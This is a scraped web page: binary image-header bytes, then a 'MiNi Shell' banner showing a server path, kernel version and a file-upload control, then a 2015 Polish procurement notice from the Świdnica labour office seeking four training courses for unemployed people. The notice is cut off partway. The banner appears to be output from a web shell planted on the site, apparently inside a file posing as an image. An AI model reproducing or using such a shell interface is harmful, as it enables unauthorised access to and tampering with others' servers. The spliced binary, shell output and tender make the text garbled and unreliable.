JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150710/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150710/102947-N-2015.html

<p class="kh_header"><b>Świdnica: Zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych w ramach projektu Aktywizacja osób w wieku od 30 roku życia pozostających bez zatrudnienia, znajdujących się w szczególnej sytuacji na rynku pracy w powiecie świdnickim realizowanego w ramach Regionalnego Programu Operacyjnego, dla 45 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne. (RPO)</b><br>
<b>Numer ogłoszenia: 102947 - 2015; data zamieszczenia: 10.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. M. Skłodowskiej-Curie 5, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8561818, faks 074 8561813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń grupowych finansowanych w ramach projektu Aktywizacja osób w wieku od 30 roku życia pozostających bez zatrudnienia, znajdujących się w szczególnej sytuacji na rynku pracy w powiecie świdnickim realizowanego w ramach Regionalnego Programu Operacyjnego, dla 45 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy jako bezrobotne. (RPO).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szkoleniami, realizowanymi w formie kursu, zostanie objętych łącznie 45 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Świdnicy.
Zamówienie podzielono na 4 części.
CZĘŚĆ 1
Spawanie blach i rur spoinami pachwinowymi metodą MAG (135) oraz blach spoinami czołowymi metodą MAG (135) - 10 osób
Szkolenie musi rozpocząć się w dniu 10.09.2015 r. i zakończyć w dniu 30.10.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 5 dni roboczych, przy zachowaniu wytycznych ujętych w opisie przedmiotu zamówienia.

Zajęcia teoretyczne oraz praktyczne należy przeprowadzić na terenie powiatu świdnickiego, Wałbrzycha lub Wrocławia, przy czym w przypadku organizacji zajęć praktycznych poza powiatem świdnickim w koszt kursu należy wliczyć dodatkowo przewóz uczestników na miejsce realizacji zajęć oraz ich powrót do Świdnicy.

Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. zastosowanie elektryczności do spawania łukowego
2. urządzenia spawalnicze
3. bezpieczeństwo i higiena pracy
4. bezpieczna praca na hali produkcyjnej
5. materiały dodatkowe do spawania
6. spawanie w praktyce
7. oznaczanie i wymiarowanie spoin
8. metody przygotowania złączy do spawania
9. kwalifikowanie spawaczy
10. budowa i użytkowanie urządzeń do spawania MAG
11. charakterystyka spawania MAG oraz typowe parametry
12. wprowadzenie do zagadnień wytwarzania stali
13. złącza spawane blach
14. spawalność stali
15. skurcz, naprężenia i odkształcenia
16. niezgodności spawalnicze
17. przegląd procesów spawania
18. bezpieczna praca na montażu
19. kontrola i badania
20. zapewnienie jakości w spawalnictwie
21. instruktaż wstępny
22. ćwiczenia praktyczne
23. umiejętność poszukiwania zatrudnienia
Zagadnienia dotyczące spawania powinny być zgodne z wytycznymi Instytutu Spawalnictwa w Gliwicach. 
Szkolenie dotyczy dwóch metod spawania, w związku z powyższym po każdej metodzie należy przeprowadzić egzamin zewnętrzny, który jest regulowany stosownymi przepisami/normami/wytycznymi z przedmiotowego zakresu (tj. IS lub UDT lub TÜV).

Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 262 godziny zegarowe, w tym:
- zajęć teoretycznych: 42 godz. zegarowych, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
- zajęć praktycznych: 220 godz. zegarowych.

Charakterystyka osób, dla których szkolenie jest przeznaczone:
- osoby zarejestrowane w tut. Urzędzie posiadające status bezrobotnego,
- ukończone 18 lat,
- wykształcenie min. podstawowe,
- brak przeciwwskazań zdrowotnych do wykonywania danego zawodu (stosowne zaświadczenie lekarskie)
GRUPA DOCELOWA: osoby bezrobotne od 30 roku znajdujące się w szczególnej sytuacji na rynku pracy, tj.:
- osoby powyżej 50 roku życia
- kobiety,
- osoby niepełnosprawne,
- osoby długotrwale bezrobotne,
- osoby niskowykwalifikowane (posiadające wykształcenie maksymalnie ponadgimnazjalne).

Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
 - w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia wydanego na podstawie § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r. poz. 622) - pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
b) certyfikat potwierdzający realizację szkolenia w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego
- w terminie do 30 dni kalendarzowych licząc od daty zdania egzaminu państwowego/zewnętrznego, wystawione przez Instytucję do tego uprawnioną:
c) świadectwo kwalifikacyjne spawacza (dla każdej metody spawania),
d) książeczkę spawacza,
e) uprawnienie IS lub UDT albo TÜV - w sytuacji przeprowadzenia egzaminu państwowego przez właściwą Instytucję zewnętrzną wyznaczoną w tym zakresie odrębnymi przepisami.

Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- posiadać umiejętność spawania prostych konstrukcji,
- wykonywać spoiny,
- uruchomić i obsługiwać urządzenia spawalnicze,
- dobierać odpowiednie parametry spawania,
- wykrywać zaburzenia w pracy,
- odczytywać rysunki konstrukcji spawanych,
- stosować odpowiednie środki ochrony indywidualnej oraz obsługiwać podręczny sprzęt przeciwpożarowy.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 10 stanowisk spawalniczych, niezbędne materiały spawalnicze, odtwarzacz DVD lub magnetowid, telewizor, projektor multimedialny, tematyczne filmy wideo lub płyty CD/DVD do zajęć, inne, w zależności od metod dobranych przez prowadzącego. W cenę szkolenia należy wliczyć kompletne ubranie ochronne, niezbędne do wykonywania zajęć praktycznych - zgodne z wytycznymi BHP dotyczącymi pracy na stanowisku spawacza (szczegółowy opis kosztów dotyczących przedmiotowego odzienia należy ująć jako załącznik do preliminarza kosztów, wykazując tym samym zarówno kategorie kosztu, jak i ceny wyszacowane za przedmiotowy zakup). Odbiór wyszacowanego w preliminarzu kosztów ubrania ochronnego, uczestnicy szkolenia muszą potwierdzić pisemnie, stosownym oświadczeniem. Ubranie ochronne używane w trakcie kursu przez każdą osobę szkoloną przechodzi na własność kursanta po zakończeniu szkolenia.

Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne i praktyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 20:00,
b) dzienny wymiar zajęć na jednego uczestnika musi wynosić nie mniej niż 6 oraz nie więcej niż 8 godzin zegarowych,
c) szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
UWAGA! W przypadku organizacji szkolenia poza obszarem powiatu świdnickiego godzina wyjazdu uczestników szkolenia ze Świdnicy nie może być wcześniejsza niż 8:00; natomiast powrót kursantów do Świdnicy nie może zakończyć się później niż o godz. 20:00.

CZĘŚĆ 2
Opiekun osoby starszej z podstawami opieki przedmedycznej i nauką języka obcego - 10 osób

Szkolenie musi rozpocząć się w dniu 24.08.2015 r. i zakończyć w dniu 30.10.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 5 dni roboczych, przy zachowaniu wytycznych ujętych w opisie przedmiotu zamówienia.

Zajęcia teoretyczne oraz praktyczne należy przeprowadzić na terenie powiatu świdnickiego, Wałbrzycha lub Wrocławia, przy czym w przypadku organizacji zajęć praktycznych poza powiatem świdnickim w koszt kursu należy wliczyć dodatkowo przewóz uczestników na miejsce realizacji zajęć oraz ich powrót do Świdnicy.

Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. psychospołeczne uwarunkowania pracy z podopiecznymi,
2. rozwiązywanie problemów podopiecznego,
3. opieka nad podopiecznymi,
4. umiejętności wspomagające pracę z podopiecznymi,
5. udzielanie pierwszej pomocy przedmedycznej,
6. profilaktyka zdrowotna,
7. nauka języka niemieckiego,
8. umiejętność poszukiwania zatrudnienia.
Zagadnienia dotyczące nauki języka niemieckiego powinny być zgodne z wytycznymi Rady Europy zawartymi w Europejskim Systemie Opisu Kształcenia Językowego (poziom biegłości A2) i muszą dotyczyć w głównej mierze języka branżowego.

Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 250 godzin zegarowych, w tym:
a) zajęć teoretycznych oraz ćwiczeń: 210 godz. zegarowych, z czego: 150 godzin zegarowych przypada na naukę języka obcego i 5 godz. zegarowych na umiejętność poszukiwania zatrudnienia 
b) zajęć praktycznych: 40 godz. zegarowych.

Charakterystyka osób, dla których szkolenie jest przeznaczone:
- osoby zarejestrowane w tut. Urzędzie posiadające status bezrobotnego,
- ukończone 18 lat,
- wykształcenie min. podstawowe,
- brak przeciwwskazań zdrowotnych do wykonywania danego zawodu (stosowne zaświadczenie lekarskie)
GRUPA DOCELOWA: osoby bezrobotne od 30 roku znajdujące się w szczególnej sytuacji na rynku pracy, tj.:
- osoby powyżej 50 roku życia
- kobiety,
- osoby niepełnosprawne,
- osoby długotrwale bezrobotne,
- osoby niskowykwalifikowane (posiadające wykształcenie maksymalnie ponadgimnazjalne).

Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
- w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia wydanego na podstawie § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r. poz. 622) - pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
b) certyfikat potwierdzający realizację szkolenia w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego.

Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- posiadać umiejętność sprawowania opieki nad osobą starszą,
- znać zasady udzielania pierwszej pomocy przedmedycznej,
- znać język niemiecki (w tym branżowy) na poziomie biegłości A1.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
odtwarzacz DVD lub magnetowid, telewizor, projektor multimedialny, tematyczne filmy wideo lub płyty CD/DVD do zajęć, rekwizyty niezbędne do wykonywania ćwiczeń oraz realizacji zajęć praktycznych, 10 kompletów książek oraz ćwiczeń do nauki języka obcego (tj. po 1 egzemplarzu dla każdego uczestnika szkolenia, które przechodzą na własność osoby szkolonej - dopuszcza się formę ksero), zbiory biblioteczne, inne, w zależności od metod dobranych przez prowadzącego.

Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne i praktyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 20:00,
b) dzienny wymiar zajęć na jednego uczestnika musi wynosić nie mniej niż 5 oraz nie więcej niż 8 godzin zegarowych,
c) szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu (za wyłączeniem realizacji modułu nauki języka obcego),
d) w przypadku zajęć teoretycznych modułu nauki języka obcego:
- zajęcia nie mogą się rozpocząć wcześniej niż o godzinie 800, trwać dłużej niż 5 godzin zegarowych dziennie i zakończyć się nie później niż o godzinie 2000,
- pomiędzy jednym dniem zajęć, a kolejnym musi być co najmniej 1 dzień przerwy,
- dopuszcza się możliwość łączenia w jednym dniu zajęć modułu nauki języka obcego z innymi modułami.
UWAGA! W przypadku organizacji szkolenia poza obszarem powiatu świdnickiego godzina wyjazdu uczestników szkolenia ze Świdnicy nie może być wcześniejsza niż 8:00; natomiast powrót kursantów do Świdnicy nie może zakończyć się później niż o godz. 20:00.

CZĘŚĆ 3
Referent kadrowo-płacowy z elementami księgowości i nauką języka obcego - 15 osób

Szkolenie musi rozpocząć się w dniu 07.09.2015 r. i zakończyć w dniu 30.10.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 5 dni roboczych, przy zachowaniu wytycznych ujętych w opisie przedmiotu zamówienia.

Zajęcia teoretyczne oraz praktyczne należy przeprowadzić na terenie powiatu świdnickiego, Wałbrzycha lub Wrocławia, przy czym w przypadku organizacji zajęć praktycznych poza powiatem świdnickim w koszt kursu należy wliczyć dodatkowo przewóz uczestników na miejsce realizacji zajęć oraz ich powrót do Świdnicy.

Zakres szkolenia powinien zawierać m.in. następujące elementy:
1. kadry,
2. płace,
3. ubezpieczenia społeczne,
4. prawo pracy,
5. klasyfikacja podmiotów gospodarczych,
6. obsługa programów kadrowo - płacowych (w tym rozliczanie małych firm w programach komputerowych),
7. program Płatnik,
8. rozliczanie gotówkowe i bezgotówkowe firmy,
9. pozyskiwanie funduszy europejskich,
10. nauka języka angielskiego,
11. umiejętność poszukiwania zatrudnienia.
Zagadnienia dotyczące nauki języka angielskiego powinny być zgodne z wytycznymi Rady Europy zawartymi w Europejskim Systemie Opisu Kształcenia Językowego (poziom biegłości A2) i muszą dotyczyć również języka branżowego.

Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 250 godzin zegarowych, w tym:
a) zajęć teoretycznych oraz ćwiczeń: 160 godz. zegarowych, z czego: 80 godzin zegarowych przypada na naukę języka obcego i 5 godz. zegarowych na umiejętność poszukiwania zatrudnienia 
b) zajęć praktycznych: 90 godz. zegarowych.

Charakterystyka osób, dla których szkolenie jest przeznaczone:
- osoby zarejestrowane w tut. Urzędzie posiadające status bezrobotnego,
- ukończone 18 lat,
- wykształcenie min. średnie.
GRUPA DOCELOWA: osoby bezrobotne od 30 roku znajdujące się w szczególnej sytuacji na rynku pracy, tj.:
- osoby powyżej 50 roku życia
- kobiety,
- osoby niepełnosprawne,
- osoby długotrwale bezrobotne,
- osoby niskowykwalifikowane (posiadające wykształcenie maksymalnie ponadgimnazjalne).

Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
- w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli Wykonawca posiada stosowny wpis do Ewidencji Placówek Niepublicznych w myśl przepisów o systemie oświaty dopuszcza się wystawienie odpowiedniego zaświadczenia wydanego na podstawie § 18 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2014 r. poz. 622) - pod warunkiem załączenia dodatkowego suplementu zawierającego wszelkie brakujące elementy, które Zamawiający określił wyżej, jako wymóg konieczny dla zaświadczeń.
b) certyfikat potwierdzający realizację szkolenia w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego.

Po zakończonym szkoleniu absolwent kursu powinien m.in.:
- posiadać umiejętność obsługi biura,
- znać podstawowe przepisy z zakresu prawa pracy oraz ubezpieczeń społecznych,
- posiadać wiedzę z zakresu zasad obowiązujących przy pozyskiwania funduszy europejskich,
- znać obsługę programów kadrowo-płacowych,
- umieć zorganizować sobie pracę w sekretariacie, księgowości, kadrach.
- znać język angielski (również branżowy) na poziomie biegłości A2.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 15 stanowisk komputerowych z zainstalowanymi programami użytkowymi oraz programami kadrowo - płacowymi i Płatnikiem, sprzęt biurowy, odtwarzacz DVD lub magnetowid, telewizor, projektor multimedialny, tematyczne filmy wideo lub płyty CD/DVD do zajęć, 15 kompletów książek oraz ćwiczeń do nauki języka obcego (tj. po 1 egzemplarzu dla każdego uczestnika szkolenia, które przechodzą na własność osoby szkolonej - dopuszcza się formę ksero), zbiory biblioteczne, inne, w zależności od metod dobranych przez prowadzącego.

Zajęcia dydaktyczne muszą być realizowane od poniedziałku do piątku (z wyłączeniem sobót i niedziel oraz dni świątecznych), przy czym:
a) zajęcia teoretyczne i praktyczne muszą rozpocząć się nie wcześniej niż o godz. 8:00 oraz zakończyć się nie później niż o godz. 20:00,
b) dzienny wymiar zajęć na jednego uczestnika musi wynosić nie mniej niż 6 oraz nie więcej niż 8 godzin zegarowych,
c) szkolenie musi trwać przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu (za wyłączeniem realizacji modułu nauki języka obcego),
d) w przypadku zajęć teoretycznych modułu nauki języka obcego:
- zajęcia nie mogą się rozpocząć wcześniej niż o godzinie 800, trwać dłużej niż 5 godzin zegarowych dziennie i zakończyć się nie później niż o godzinie 2000,
- pomiędzy jednym dniem zajęć, a kolejnym musi być co najmniej 1 dzień przerwy,
- dopuszcza się możliwość łączenia w jednym dniu zajęć modułu nauki języka obcego z innymi modułami.
UWAGA! W przypadku organizacji szkolenia poza obszarem powiatu świdnickiego godzina wyjazdu uczestników szkolenia ze Świdnicy nie może być wcześniejsza niż 8:00; natomiast powrót kursantów do Świdnicy nie może zakończyć się później niż o godz. 20:00.

CZĘŚĆ 4
Programowanie i obsługa obrabiarek sterowanych numerycznie CNC z blokiem rysunku technicznego - 10 osób

Szkolenie musi rozpocząć się w dniu 21.09.2015 r. i zakończyć w dniu 30.10.2015 r.
UWAGA: Zamawiający dopuszcza możliwość skrócenia lub przedłużenia terminu zakończenia szkolenia do 5 dni roboczych, przy zachowaniu wytycznych ujętych w opisie przedmiotu zamówienia.

Zajęcia teoretyczne oraz praktyczne należy przeprowadzić na terenie powiatu świdnickiego, Wałbrzycha lub Wrocławia, przy czym w przypadku organizacji zajęć praktycznych poza powiatem świdnickim w koszt kursu należy wliczyć dodatkowo przewóz uczestników na miejsce realizacji zajęć oraz ich powrót do Świdnicy.

Zakres szkolenia powinien zawierać m.in. następujące elementy:
1) przepisy BHP i ergonomia pracy w zakresie obszaru zawodowego,
2) pomiar kształtu i wymiarów przedmiotu obrabianego,
3) kompletowanie, analiza i czytanie rysunku technicznego,
4) obróbka skrawaniem i narzędzia skrawające w zakresie obrabiarek CNC,
5) budowa obrabiarek CNC. Sterowanie i obsługa obrabiarek CNC. Przygotowanie obrabiarki CNC do pracy,
6) przygotowanie programu do uruchomienia,
7) uruchomienie i przebieg programu obróbki,
8) szkolenie praktyczne na maszynach produkcyjnych,
9) praktyczna nauka obsługi tokarki oraz frezarki CNC,
10) umiejętność poszukiwania i pozyskiwania zatrudnienia.
Szkolenie winno zostać zrealizowane w formie zajęć teoretycznych i praktycznych, przy czym zajęcia teoretyczne obejmujące zagadnienia wskazane w pozycjach 2-7 muszą zostać przeprowadzone również w postaci ćwiczeń.

Ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Na jednego uczestnika szkolenia przypada 180 godzin zegarowych, w tym:
a) zajęć teoretycznych oraz ćwiczeń: 60 godz. zegarowych, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
b) zajęć praktycznych: 120 godz. zegarowych.

Charakterystyka osób, dla których szkolenie jest przeznaczone:
- osoby zarejestrowane w tut. Urzędzie posiadające status bezrobotnego,
- ukończone 18 lat,
- wykształcenie min. zawodowe (preferowane mechaniczne ze znajomością rysunku technicznego),
- brak przeciwwskazań zdrowotnych do wykonywania danego zawodu (stosowne zaświadczenie lekarskie)
GRUPA DOCELOWA: osoby bezrobotne od 30 roku znajdujące się w szczególnej sytuacji na rynku pracy, tj.:
- osoby powyżej 50 roku życia
- kobiety,
- osoby niepełnosprawne,
- osoby długotrwale bezrobotne,
- osoby niskowykwalifikowane (posiadające wykształcenie maksymalnie ponadgimnazjalne).

Wykonawca wyda uczestnikom szkolenia m.in. następujące dokumenty:
- w terminie do 3 dni roboczych licząc od daty zakończenia szkolenia:
a) zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji zawierający, o ile odrębne przepisy nie stanowią inaczej: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
